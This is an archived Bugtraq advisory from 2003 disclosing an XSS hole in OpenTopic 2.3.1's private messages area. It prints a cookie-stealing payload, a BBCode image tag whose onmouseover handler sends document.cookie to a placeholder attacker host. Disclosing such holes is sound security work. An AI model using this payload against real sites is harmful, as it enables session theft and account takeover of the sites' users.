Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

OpenTopic security hole
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sat, 04 Jan 2003 16:20:34 +0100
Informations :
°°°°°°°°°°°°°°
Product : OpenTopic
Website : http://www.infopop.com
Version : 2.3.1
Problem : XSS (script injection) -> Cookies recovery


Location/Exploit :
°°°°°°°°°°°°°°°°°°
The XSS hole is in the private messages area ( http://[target]/OpenTopic?a=ugtpc ). 
XSS to get cookie :
[IMG]http://[website]/img.gif"width="750"height="750"onmouseover="a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG]


More details about XSS :
°°°°°°°°°°°°°°°°°°°°°°°°
In French :
http://www.phpsecure.org/article/XSS.php
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.phpsecure.org%2Farticle%2FXSS.php&langpair=fr%7Cen&hl=en&ie=ASCII&oe=ASCII


frog-m () n



_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp

  By Date           By Thread  

Current thread:
  • OpenTopic security hole Frog Man (Jan 04)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]